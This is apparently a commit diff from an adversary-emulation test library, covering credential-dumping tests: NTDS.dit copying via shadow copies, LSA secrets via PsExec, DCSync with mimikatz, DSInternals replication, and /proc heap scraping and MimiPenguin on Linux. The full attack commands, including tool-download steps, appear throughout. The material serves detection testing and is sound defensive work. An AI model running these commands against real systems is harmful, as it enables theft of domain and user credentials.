if not exist #{extract_path} (exit /b 1)
if not exist #{extract_path} (exit /b 1)
```
##### Get Prereq Commands:
```cmd
@@ -170,14 +158,10 @@ Upon successful completion, you will find a copy of the ntds.dit file in the C:\
**Supported Platforms:** Windows
**auto_generated_guid:** 2364e33d-ceab-4641-8468-bfb1d7cc2723
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_folder | Path where resulting dump should be placed | Path | C:&#92;Windows&#92;Temp&#92;ntds_T1003|
@@ -201,7 +185,7 @@ rmdir /q /s #{output_folder} >nul 2>&1
##### Description: Target must be a Domain Controller
##### Check Prereq Commands:
```cmd
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT
```
##### Get Prereq Commands:
```cmd
@@ -222,16 +206,12 @@ The Active Directory database NTDS.dit may be dumped by copying it from a Volume
**Supported Platforms:** Windows
**auto_generated_guid:** 224f7de0-8f0a-4a94-b5d8-989b036c86da
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| drive_letter | Drive letter to source VSC (including colon and backslash) | String | C:&#92;|
| drive_letter | Drive letter to source VSC (including colon) | String | C:|
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
@@ -248,7 +228,7 @@ wmic shadowcopy call create Volume=#{drive_letter}
##### Description: Target must be a Domain Controller
##### Check Prereq Commands:
```cmd
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT
```
##### Get Prereq Commands:
```cmd
@@ -261,102 +241,7 @@ echo Sorry, Promoting this machine to a Domain Controller must be done manually
<br/>
<br/>
## Atomic Test #5 - Create Volume Shadow Copy remotely with WMI
This test is intended to be run from a remote workstation with domain admin context.
The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
**Supported Platforms:** Windows
**auto_generated_guid:** d893459f-71f0-484d-9808-ec83b2b64226
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| drive_letter | Drive letter to source VSC (including colon and backslash) | String | C:&#92;|
| target_host | IP Address / Hostname you want to target | String | localhost|
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
wmic /node:"#{target_host}" shadowcopy call create Volume=#{drive_letter}
```
#### Dependencies: Run with `command_prompt`!
##### Description: Target must be a reachable Domain Controller, and current context must be domain admin
##### Check Prereq Commands:
```cmd
wmic /node:"#{target_host}" shadowcopy list brief
```
##### Get Prereq Commands:
```cmd
echo Sorry, can't connect to target host, check: network, firewall or permissions (must be admin on target)
```
<br/>
<br/>
## Atomic Test #6 - Create Volume Shadow Copy remotely (WMI) with esentutl
This test is intended to be run from a remote workstation with domain admin context.
The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy created with esentutl.
**Supported Platforms:** Windows
**auto_generated_guid:** 21c7bf80-3e8b-40fa-8f9d-f5b194ff2865
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| source_path | File to shadow copy | String | c:&#92;windows&#92;ntds&#92;ntds.dit|
| target_path | Target path of the result file | String | c:&#92;ntds.dit|
| target_host | IP Address / Hostname you want to target | String | localhost|
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
wmic /node:"#{target_host}" process call create "cmd.exe /c esentutl.exe /y /vss #{source_path} /d #{target_path}"
```
#### Dependencies: Run with `command_prompt`!
##### Description: Target must be a reachable Domain Controller, and current context must be domain admin
##### Check Prereq Commands:
```cmd
wmic /node:"#{target_host}" shadowcopy list brief
```
##### Get Prereq Commands:
```cmd
echo Sorry, can't connect to target host, check: network, firewall or permissions (must be admin on target)
```
<br/>
<br/>
## Atomic Test #7 - Create Volume Shadow Copy with Powershell
## Atomic Test #5 - Create Volume Shadow Copy with Powershell
This test is intended to be run on a domain Controller.
The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
@@ -364,23 +249,19 @@ The Active Directory database NTDS.dit may be dumped by copying it from a Volume
**Supported Platforms:** Windows
**auto_generated_guid:** 542bb97e-da53-436b-8e43-e0a7d31a6c24
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| drive_letter | Drive letter to source VSC (including colon) | String | C:&#92;|
| drive_letter | Drive letter to source VSC (including colon) | String | C:|
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
(gwmi -list win32_shadowcopy).Create('#{drive_letter}','ClientAccessible')
(gwmi -list win32_shadowcopy).Create(#{drive_letter},'ClientAccessible')
```
@@ -391,7 +272,7 @@ The Active Directory database NTDS.dit may be dumped by copying it from a Volume
<br/>
<br/>
## Atomic Test #8 - Create Symlink to Volume Shadow Copy
## Atomic Test #6 - Create Symlink to Volume Shadow Copy
This test is intended to be run on a domain Controller.
The Active Directory database NTDS.dit may be dumped by creating a symlink to Volume Shadow Copy.
@@ -399,14 +280,10 @@ The Active Directory database NTDS.dit may be dumped by creating a symlink to Vo
**Supported Platforms:** Windows
**auto_generated_guid:** 21748c28-2793-4284-9e07-d6d028b66702
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| drive_letter | Drive letter to source VSC (including colon) | String | C:|
| symlink_path | symlink path | String | C:&#92;Temp&#92;vssstore|
atomics/T1003.003/T1003.003.yaml
+5 -67
View File
@@ -60,7 +60,7 @@ atomic_tests:
prereq_command: |
if not exist #{vsc_name} (exit /b 1)
get_prereq_command: |
echo Run "Invoke-AtomicTest T1003.003 -TestName 'Create Volume Shadow Copy with vssadmin'" to fulfill this requirement
echo Run "Invoke-AtomicTest T1003.003 -TestName 'Create Volume Shadow Copy with vassadmin'" to fulfuill this requirement
- description: |
Extract path must exist
prereq_command: |
@@ -122,9 +122,9 @@ atomic_tests:
- windows
input_arguments:
drive_letter:
description: Drive letter to source VSC (including colon and backslash)
description: Drive letter to source VSC (including colon)
type: String
default: 'C:\'
default: 'C:'
dependencies:
- description: |
Target must be a Domain Controller
@@ -138,68 +138,6 @@ atomic_tests:
name: command_prompt
elevation_required: true
- name: Create Volume Shadow Copy remotely with WMI
auto_generated_guid: d893459f-71f0-484d-9808-ec83b2b64226
description: |
This test is intended to be run from a remote workstation with domain admin context.
The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
supported_platforms:
- windows
input_arguments:
drive_letter:
description: Drive letter to source VSC (including colon and backslash)
type: String
default: 'C:\'
target_host:
description: IP Address / Hostname you want to target
type: String
default: localhost
dependencies:
- description: |
Target must be a reachable Domain Controller, and current context must be domain admin
prereq_command: |
wmic /node:"#{target_host}" shadowcopy list brief
get_prereq_command: |
echo Sorry, can't connect to target host, check: network, firewall or permissions (must be admin on target)
executor:
command: |
wmic /node:"#{target_host}" shadowcopy call create Volume=#{drive_letter}
name: command_prompt
elevation_required: true
- name: Create Volume Shadow Copy remotely (WMI) with esentutl
auto_generated_guid: 21c7bf80-3e8b-40fa-8f9d-f5b194ff2865
description: |
This test is intended to be run from a remote workstation with domain admin context.
The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy created with esentutl.
supported_platforms:
- windows
input_arguments:
source_path:
description: File to shadow copy
type: String
default: 'c:\windows\ntds\ntds.dit'
target_path:
description: Target path of the result file
type: String
default: 'c:\ntds.dit'
target_host:
description: IP Address / Hostname you want to target
type: String
default: localhost
dependencies:
- description: |
Target must be a reachable Domain Controller, and current context must be domain admin
prereq_command: |
wmic /node:"#{target_host}" shadowcopy list brief
get_prereq_command: |
echo Sorry, can't connect to target host, check: network, firewall or permissions (must be admin on target)
executor:
command: |
wmic /node:"#{target_host}" process call create "cmd.exe /c esentutl.exe /y /vss #{source_path} /d #{target_path}"
name: command_prompt
elevation_required: true
- name: Create Volume Shadow Copy with Powershell
auto_generated_guid: 542bb97e-da53-436b-8e43-e0a7d31a6c24
description: |
@@ -212,10 +150,10 @@ atomic_tests:
drive_letter:
description: Drive letter to source VSC (including colon)
type: String
default: 'C:\'
default: 'C:'
executor:
command: |
(gwmi -list win32_shadowcopy).Create('#{drive_letter}','ClientAccessible')
(gwmi -list win32_shadowcopy).Create(#{drive_letter},'ClientAccessible')
name: powershell
elevation_required: true
atomics/T1003.004/T1003.004.md
+3 -7
View File
@@ -20,14 +20,10 @@ https://pentestlab.blog/2018/04/04/dumping-clear-text-credentials/#:~:text=LSA%2
**Supported Platforms:** Windows
**auto_generated_guid:** 55295ab0-a703-433b-9ca4-ae13807de12f
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| psexec_exe | Path to PsExec executable | Path | PathToAtomicsFolder&#92;T1003.004&#92;bin&#92;PsExec.exe|
@@ -36,7 +32,7 @@ https://pentestlab.blog/2018/04/04/dumping-clear-text-credentials/#:~:text=LSA%2
```cmd
#{psexec_exe} -accepteula -s reg save HKLM\security\policy\secrets %temp%\secrets /y
#{psexec_exe} -accepteula -s reg save HKLM\security\policy\secrets %temp%\secrets
```
#### Cleanup Commands:
@@ -50,7 +46,7 @@ del %temp%\secrets >nul 2> nul
##### Description: PsExec from Sysinternals must exist on disk at specified location (#{psexec_exe})
##### Check Prereq Commands:
```powershell
if (Test-Path #{psexec_exe}) {exit 0} else {exit 1}
if (Test-Path #{psexec_exe}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
atomics/T1003.004/T1003.004.yaml
+1 -1
View File
@@ -25,7 +25,7 @@ atomic_tests:
New-Item -ItemType Directory (Split-Path #{psexec_exe}) -Force | Out-Null
Copy-Item $env:TEMP\PSTools\PsExec.exe #{psexec_exe} -Force
executor:
command: '#{psexec_exe} -accepteula -s reg save HKLM\security\policy\secrets %temp%\secrets /y'
command: '#{psexec_exe} -accepteula -s reg save HKLM\security\policy\secrets %temp%\secrets'
cleanup_command: del %temp%\secrets >nul 2> nul
name: command_prompt
elevation_required: true
atomics/T1003.005/T1003.005.md
-47
View File
@@ -1,47 +0,0 @@
# T1003.005 - Cached Domain Credentials
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1003/005)
<blockquote>Adversaries may attempt to access cached domain credentials used to allow authentication to occur in the event a domain controller is unavailable.(Citation: Microsoft - Cached Creds)
On Windows Vista and newer, the hash format is DCC2 (Domain Cached Credentials version 2) hash, also known as MS-Cache v2 hash.(Citation: PassLib mscache) The number of default cached credentials varies and can be altered per system. This hash does not allow pass-the-hash style attacks, and instead requires [Password Cracking](https://attack.mitre.org/techniques/T1110/002) to recover the plaintext password.(Citation: ired mscache)
With SYSTEM access, the tools/utilities such as [Mimikatz](https://attack.mitre.org/software/S0002), [Reg](https://attack.mitre.org/software/S0075), and secretsdump.py can be used to extract the cached credentials.
Note: Cached credentials for Windows Vista are derived using PBKDF2.(Citation: PassLib mscache)</blockquote>
## Atomic Tests
- [Atomic Test #1 - Cached Credential Dump via Cmdkey](#atomic-test-1---cached-credential-dump-via-cmdkey)
<br/>
## Atomic Test #1 - Cached Credential Dump via Cmdkey
List credentials currently stored on the host via the built-in Windows utility cmdkey.exe
Credentials listed with Cmdkey only pertain to the current user
Passwords will not be displayed once they are stored
https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmdkey
https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation
**Supported Platforms:** Windows
**auto_generated_guid:** 56506854-89d6-46a3-9804-b7fde90791f9
#### Attack Commands: Run with `command_prompt`!
```cmd
cmdkey /list
```
<br/>
atomics/T1003.005/T1003.005.yaml
-18
View File
@@ -1,18 +0,0 @@
attack_technique: T1003.005
display_name: 'OS Credential Dumping: Cached Domain Credentials'
atomic_tests:
- name: Cached Credential Dump via Cmdkey
auto_generated_guid: 56506854-89d6-46a3-9804-b7fde90791f9
description: |
List credentials currently stored on the host via the built-in Windows utility cmdkey.exe
Credentials listed with Cmdkey only pertain to the current user
Passwords will not be displayed once they are stored
https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmdkey
https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation
supported_platforms:
- windows
executor:
name: command_prompt
elevation_required: false
command: |
cmdkey /list
atomics/T1003.006/T1003.006.md
-121
View File
@@ -1,121 +0,0 @@
# T1003.006 - DCSync
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1003/006)
<blockquote>Adversaries may attempt to access credentials and other sensitive information by abusing a Windows Domain Controller's application programming interface (API)(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) (Citation: Wine API samlib.dll) to simulate the replication process from a remote domain controller using a technique called DCSync.
Members of the Administrators, Domain Admins, and Enterprise Admin groups or computer accounts on the domain controller are able to run DCSync to pull password data(Citation: ADSecurity Mimikatz DCSync) from Active Directory, which may include current and historical hashes of potentially useful accounts such as KRBTGT and Administrators. The hashes can then in turn be used to create a [Golden Ticket](https://attack.mitre.org/techniques/T1558/001) for use in [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003)(Citation: Harmj0y Mimikatz and DCSync) or change an account's password as noted in [Account Manipulation](https://attack.mitre.org/techniques/T1098).(Citation: InsiderThreat ChangeNTLM July 2017)
DCSync functionality has been included in the "lsadump" module in [Mimikatz](https://attack.mitre.org/software/S0002).(Citation: GitHub Mimikatz lsadump Module) Lsadump also includes NetSync, which performs DCSync over a legacy replication protocol.(Citation: Microsoft NRPC Dec 2017)</blockquote>
## Atomic Tests
- [Atomic Test #1 - DCSync (Active Directory)](#atomic-test-1---dcsync-active-directory)
- [Atomic Test #2 - Run DSInternals Get-ADReplAccount](#atomic-test-2---run-dsinternals-get-adreplaccount)
<br/>
## Atomic Test #1 - DCSync (Active Directory)
Active Directory attack allowing retrieval of account information without accessing memory or retrieving the NTDS database.
Works against a remote Windows Domain Controller using the replication protocol.
Privileges required: domain admin or domain controller account (by default), or any other account with required rights.
[Reference](https://adsecurity.org/?p=1729)
**Supported Platforms:** Windows
**auto_generated_guid:** 129efd28-8497-4c87-a1b0-73b9a870ca3e
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| domain | Targeted Active Directory domain | String | %userdnsdomain%|
| user | Targeted user | String | krbtgt|
| mimikatz_path | Mimikatz windows executable | Path | %tmp%&#92;mimikatz&#92;x64&#92;mimikatz.exe|
#### Attack Commands: Run with `command_prompt`!
```cmd
#{mimikatz_path} "lsadump::dcsync /domain:#{domain} /user:#{user}@#{domain}" "exit"
```
#### Dependencies: Run with `powershell`!
##### Description: Mimikatz executor must exist on disk and at specified location (#{mimikatz_path})
##### Check Prereq Commands:
```powershell
$mimikatz_path = cmd /c echo #{mimikatz_path}
if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
$mimikatz_path = cmd /c echo #{mimikatz_path}
$mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href
Invoke-WebRequest "https://github.com$mimikatz_relative_uri" -UseBasicParsing -OutFile "$env:TEMP\mimikatz.zip"
Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force
New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null
Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force
```
<br/>
<br/>
## Atomic Test #2 - Run DSInternals Get-ADReplAccount
The following Atomic will run Get-ADReplAccount from DSInternals.
Upon successful execution, domain and credentials will appear in stdout.
[Reference](https://www.crowdstrike.com/blog/observations-from-the-stellarparticle-campaign/) CrowdStrike StellerParticle.
https://www.dsinternals.com/en/retrieving-active-directory-passwords-remotely/
**Supported Platforms:** Windows
**auto_generated_guid:** a0bced08-3fc5-4d8b-93b7-e8344739376e
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| logonserver | ComputerName argument default %logonserver% | String | $ENV:logonserver.TrimStart("&#92;")|
#### Attack Commands: Run with `powershell`!
```powershell
Get-ADReplAccount -All -Server #{logonserver}
```
#### Dependencies: Run with `powershell`!
##### Description: DSInternals must be installed
##### Check Prereq Commands:
```powershell
$RequiredModule = Get-Module -Name DSInternals -ListAvailable
if (-not $RequiredModule) {exit 1}
if (-not $RequiredModule.ExportedCommands['DSInternals']) {exit 1} else {exit 0}
```
##### Get Prereq Commands:
```powershell
Install-Module -Name DSInternals -Scope CurrentUser -Force
```
<br/>
atomics/T1003.006/T1003.006.yaml
-74
View File
@@ -1,74 +0,0 @@
attack_technique: T1003.006
display_name: "OS Credential Dumping: DCSync"
atomic_tests:
- name: DCSync (Active Directory)
auto_generated_guid: 129efd28-8497-4c87-a1b0-73b9a870ca3e
description: |
Active Directory attack allowing retrieval of account information without accessing memory or retrieving the NTDS database.
Works against a remote Windows Domain Controller using the replication protocol.
Privileges required: domain admin or domain controller account (by default), or any other account with required rights.
[Reference](https://adsecurity.org/?p=1729)
supported_platforms:
- windows
input_arguments:
domain:
description: Targeted Active Directory domain
type: String
default: '%userdnsdomain%'
user:
description: Targeted user
type: String
default: krbtgt
mimikatz_path:
description: Mimikatz windows executable
type: Path
default: '%tmp%\mimikatz\x64\mimikatz.exe'
dependency_executor_name: powershell
dependencies:
- description: |
Mimikatz executor must exist on disk and at specified location (#{mimikatz_path})
prereq_command: |
$mimikatz_path = cmd /c echo #{mimikatz_path}
if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
get_prereq_command: |
$mimikatz_path = cmd /c echo #{mimikatz_path}
$mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href
Invoke-WebRequest "https://github.com$mimikatz_relative_uri" -UseBasicParsing -OutFile "$env:TEMP\mimikatz.zip"
Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force
New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null
Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force
executor:
name: command_prompt
elevation_required: false
command: |
#{mimikatz_path} "lsadump::dcsync /domain:#{domain} /user:#{user}@#{domain}" "exit"
- name: Run DSInternals Get-ADReplAccount
auto_generated_guid: a0bced08-3fc5-4d8b-93b7-e8344739376e
description: |
The following Atomic will run Get-ADReplAccount from DSInternals.
Upon successful execution, domain and credentials will appear in stdout.
[Reference](https://www.crowdstrike.com/blog/observations-from-the-stellarparticle-campaign/) CrowdStrike StellerParticle.
https://www.dsinternals.com/en/retrieving-active-directory-passwords-remotely/
supported_platforms:
- windows
input_arguments:
logonserver:
description: ComputerName argument default %logonserver%
type: String
default: $ENV:logonserver.TrimStart("\")
dependency_executor_name: powershell
dependencies:
- description: |
DSInternals must be installed
prereq_command: |
$RequiredModule = Get-Module -Name DSInternals -ListAvailable
if (-not $RequiredModule) {exit 1}
if (-not $RequiredModule.ExportedCommands['DSInternals']) {exit 1} else {exit 0}
get_prereq_command: |
Install-Module -Name DSInternals -Scope CurrentUser -Force
executor:
command: |
Get-ADReplAccount -All -Server #{logonserver}
name: powershell
elevation_required: False
atomics/T1003.007/T1003.007.md
-227
View File
@@ -1,227 +0,0 @@
# T1003.007 - Proc Filesystem
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1003/007)
<blockquote>Adversaries may gather credentials from information stored in the Proc filesystem or <code>/proc</code>. The Proc filesystem on Linux contains a great deal of information regarding the state of the running operating system. Processes running with root privileges can use this facility to scrape live memory of other running programs. If any of these programs store passwords in clear text or password hashes in memory, these values can then be harvested for either usage or brute force attacks, respectively.
This functionality has been implemented in the MimiPenguin(Citation: MimiPenguin GitHub May 2017), an open source tool inspired by Mimikatz. The tool dumps process memory, then harvests passwords and hashes by looking for text strings and regex patterns for how given applications such as Gnome Keyring, sshd, and Apache use memory to store such authentication artifacts.</blockquote>
## Atomic Tests
- [Atomic Test #1 - Dump individual process memory with sh (Local)](#atomic-test-1---dump-individual-process-memory-with-sh-local)
- [Atomic Test #2 - Dump individual process memory with Python (Local)](#atomic-test-2---dump-individual-process-memory-with-python-local)
- [Atomic Test #3 - Capture Passwords with MimiPenguin](#atomic-test-3---capture-passwords-with-mimipenguin)
<br/>
## Atomic Test #1 - Dump individual process memory with sh (Local)
Using `/proc/$PID/mem`, where $PID is the target process ID, use shell utilities to
copy process memory to an external file so it can be searched or exfiltrated later.
**Supported Platforms:** Linux
**auto_generated_guid:** 7e91138a-8e74-456d-a007-973d67a0bb80
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Path where captured results will be placed | Path | /tmp/T1003.007.bin|
| script_path | Path to script generating the target process | Path | /tmp/T1003.007.sh|
| pid_term | Unique string to use to identify target process | String | T1003.007|
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
sh #{script_path}
PID=$(pgrep -n -f "#{pid_term}")
HEAP_MEM=$(grep -E "^[0-9a-f-]* r" /proc/"$PID"/maps | grep heap | cut -d' ' -f 1)
MEM_START=$(echo $((0x$(echo "$HEAP_MEM" | cut -d"-" -f1))))
MEM_STOP=$(echo $((0x$(echo "$HEAP_MEM" | cut -d"-" -f2))))
MEM_SIZE=$(echo $((0x$MEM_STOP-0x$MEM_START)))
dd if=/proc/"${PID}"/mem of="#{output_file}" ibs=1 skip="$MEM_START" count="$MEM_SIZE"
grep -i "PASS" "#{output_file}"
```
#### Cleanup Commands:
```sh
rm -f "#{output_file}"
```
#### Dependencies: Run with `sh`!
##### Description: Script to launch target process must exist
##### Check Prereq Commands:
```sh
test -f #{script_path}
grep "#{pid_term}" #{script_path}
```
##### Get Prereq Commands:
```sh
echo '#!/bin/sh' > #{script_path}
echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_path}
```
<br/>
<br/>
## Atomic Test #2 - Dump individual process memory with Python (Local)
Using `/proc/$PID/mem`, where $PID is the target process ID, use a Python script to
copy a process's heap memory to an external file so it can be searched or exfiltrated later.
**Supported Platforms:** Linux
**auto_generated_guid:** 437b2003-a20d-4ed8-834c-4964f24eec63
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Path where captured results will be placed | Path | /tmp/T1003.007.bin|
| script_path | Path to script generating the target process | Path | /tmp/T1003.007.sh|
| python_script | Path to script generating the target process | Path | PathToAtomicsFolder/T1003.007/src/dump_heap.py|
| pid_term | Unique string to use to identify target process | String | T1003.007|
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
sh #{script_path}
PID=$(pgrep -n -f "#{pid_term}")
PYTHON=$(which python || which python3 || which python2)
$PYTHON #{python_script} $PID #{output_file}
grep -i "PASS" "#{output_file}"
```
#### Cleanup Commands:
```sh
rm -f "#{output_file}"
```
#### Dependencies: Run with `sh`!
##### Description: Script to launch target process must exist
##### Check Prereq Commands:
```sh
test -f #{script_path}
grep "#{pid_term}" #{script_path}
```
##### Get Prereq Commands:
```sh
echo '#!/bin/sh' > #{script_path}
echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_path}
```
##### Description: Requires Python
##### Check Prereq Commands:
```sh
(which python || which python3 || which python2)
```
##### Get Prereq Commands:
```sh
echo "Python 2.7+ or 3.4+ must be installed"
```
<br/>
<br/>
## Atomic Test #3 - Capture Passwords with MimiPenguin
MimiPenguin is a tool inspired by MimiKatz that targets Linux systems affected by CVE-2018-20781 (Ubuntu-based distros and certain versions of GNOME Keyring).
Upon successful execution on an affected system, MimiPenguin will retrieve passwords from memory and output them to a specified file.
See https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20781.
See https://www.tecmint.com/mimipenguin-hack-login-passwords-of-linux-users/#:~:text=Mimipenguin%20is%20a%20free%20and,tested%20on%20various%20Linux%20distributions.
**Supported Platforms:** Linux
**auto_generated_guid:** a27418de-bdce-4ebd-b655-38f04842bf0c
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Path where captured results will be placed | Path | /tmp/T1003.007Test3.txt|
| MimiPenguin_Location | Path of MimiPenguin script | Path | /tmp/mimipenguin/mimipenguin_2.0-release/mimipenguin.sh|
#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin)
```bash
sudo #{MimiPenguin_Location} > #{output_file}
cat #{output_file}
```
#### Cleanup Commands:
```bash
rm -f #{output_file} > /dev/null
```
#### Dependencies: Run with `sh`!
##### Description: MimiPenguin script must exist on disk at specified location (#{MimiPenguin_Location})
##### Check Prereq Commands:
```sh
if [ -f "#{MimiPenguin_Location}" ]; then exit 0; else exit 1; fi;
```
##### Get Prereq Commands:
```sh
wget -O "/tmp/mimipenguin.tar.gz" https://github.com/huntergregal/mimipenguin/releases/download/2.0-release/mimipenguin_2.0-release.tar.gz
mkdir /tmp/mimipenguin
tar -xzvf "/tmp/mimipenguin.tar.gz" -C /tmp/mimipenguin
```
##### Description: Strings must be installed
##### Check Prereq Commands:
```sh
if [ -x "$(command -v strings --version)" ]; then exit 0; else exit 1; fi;
```
##### Get Prereq Commands:
```sh
sudo apt-get -y install binutils
```
##### Description: Python2 must be installed
##### Check Prereq Commands:
```sh
if [ -x "$(command -v python2 --version)" ]; then exit 0; else exit 1; fi;
```
##### Get Prereq Commands:
```sh
sudo apt-get -y install python2
```
##### Description: Libc-bin must be installed
##### Check Prereq Commands:
```sh
if [ -x "$(command -v ldd --version)" ]; then exit 0; else exit 1; fi;
```
##### Get Prereq Commands:
```sh
sudo apt-get -y install libc-bin
```
<br/>
atomics/T1003.007/T1003.007.yaml
-160
View File
@@ -1,160 +0,0 @@
---
attack_technique: T1003.007
display_name: 'OS Credential Dumping: Proc Filesystem'
atomic_tests:
- name: Dump individual process memory with sh (Local)
auto_generated_guid: 7e91138a-8e74-456d-a007-973d67a0bb80
description: |
Using `/proc/$PID/mem`, where $PID is the target process ID, use shell utilities to
copy process memory to an external file so it can be searched or exfiltrated later.
supported_platforms:
- linux
input_arguments:
output_file:
description: Path where captured results will be placed
type: Path
default: /tmp/T1003.007.bin
script_path:
description: Path to script generating the target process
type: Path
default: /tmp/T1003.007.sh
pid_term:
description: Unique string to use to identify target process
type: String
default: T1003.007
dependencies:
- description: |
Script to launch target process must exist
prereq_command: |
test -f #{script_path}
grep "#{pid_term}" #{script_path}
get_prereq_command: |
echo '#!/bin/sh' > #{script_path}
echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_path}
executor:
name: sh
elevation_required: true
command: |
sh #{script_path}
PID=$(pgrep -n -f "#{pid_term}")
HEAP_MEM=$(grep -E "^[0-9a-f-]* r" /proc/"$PID"/maps | grep heap | cut -d' ' -f 1)
MEM_START=$(echo $((0x$(echo "$HEAP_MEM" | cut -d"-" -f1))))
MEM_STOP=$(echo $((0x$(echo "$HEAP_MEM" | cut -d"-" -f2))))
MEM_SIZE=$(echo $((0x$MEM_STOP-0x$MEM_START)))
dd if=/proc/"${PID}"/mem of="#{output_file}" ibs=1 skip="$MEM_START" count="$MEM_SIZE"
grep -i "PASS" "#{output_file}"
cleanup_command: |
rm -f "#{output_file}"
- name: Dump individual process memory with Python (Local)
auto_generated_guid: 437b2003-a20d-4ed8-834c-4964f24eec63
description: |
Using `/proc/$PID/mem`, where $PID is the target process ID, use a Python script to
copy a process's heap memory to an external file so it can be searched or exfiltrated later.
supported_platforms:
- linux
input_arguments:
output_file:
description: Path where captured results will be placed
type: Path
default: /tmp/T1003.007.bin
script_path:
description: Path to script generating the target process
type: Path
default: /tmp/T1003.007.sh
python_script:
description: Path to script generating the target process
type: Path
default: PathToAtomicsFolder/T1003.007/src/dump_heap.py
pid_term:
description: Unique string to use to identify target process
type: String
default: T1003.007
dependencies:
- description: |
Script to launch target process must exist
prereq_command: |
test -f #{script_path}
grep "#{pid_term}" #{script_path}
get_prereq_command: |
echo '#!/bin/sh' > #{script_path}
echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_path}
- description: |
Requires Python
prereq_command: |
(which python || which python3 || which python2)
get_prereq_command: |
echo "Python 2.7+ or 3.4+ must be installed"
executor:
name: sh
elevation_required: true
command: |
sh #{script_path}
PID=$(pgrep -n -f "#{pid_term}")
PYTHON=$(which python || which python3 || which python2)
$PYTHON #{python_script} $PID #{output_file}
grep -i "PASS" "#{output_file}"
cleanup_command: |
rm -f "#{output_file}"
- name: Capture Passwords with MimiPenguin
auto_generated_guid: a27418de-bdce-4ebd-b655-38f04842bf0c
description: |
MimiPenguin is a tool inspired by MimiKatz that targets Linux systems affected by CVE-2018-20781 (Ubuntu-based distros and certain versions of GNOME Keyring).
Upon successful execution on an affected system, MimiPenguin will retrieve passwords from memory and output them to a specified file.
See https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20781.
See https://www.tecmint.com/mimipenguin-hack-login-passwords-of-linux-users/#:~:text=Mimipenguin%20is%20a%20free%20and,tested%20on%20various%20Linux%20distributions.
supported_platforms:
- linux
input_arguments:
output_file:
description: Path where captured results will be placed
type: Path
default: /tmp/T1003.007Test3.txt
MimiPenguin_Location:
description: Path of MimiPenguin script
type: Path
default: /tmp/mimipenguin/mimipenguin_2.0-release/mimipenguin.sh
dependency_executor_name: sh
